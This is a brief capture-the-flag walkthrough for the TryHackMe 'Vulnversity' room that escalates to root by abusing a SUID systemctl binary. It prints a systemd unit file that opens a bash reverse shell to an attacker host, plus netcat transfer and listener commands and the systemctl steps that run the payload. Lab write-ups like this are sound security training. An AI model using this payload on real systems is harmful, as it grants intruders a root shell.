Vulnversity (Privilege Escalation)
Misconfigured Permissions — sudo/SUID
Practice box https://tryhackme.com/room/vulnversity
0. Prepare your payload root.service
root.service
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'
[Install]
WantedBy=multi-user.target
1. Find files/directories that writable
find -type f -maxdepth 2 -writable
or
find -type d -maxdepth 2 -writable
2. Transfer the payload(There might be other ways)
Init the target listening to the port
nc -vl 44444 > root.service
Send the file to target
nc -n TargetIP 44444 < root.service
3. Start listening on the 9999
nc -lvnp 9999
4. Execute the payload(assume the file is under /var/tmp)
/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service
/bin/systemctl start root
5. The listening 9999 would give you the root
6. Alternative solution: https://gtfobins.github.io/gtfobins/systemctl/
Expand Knowlege
https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory
https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/
Last updated
Was this helpful?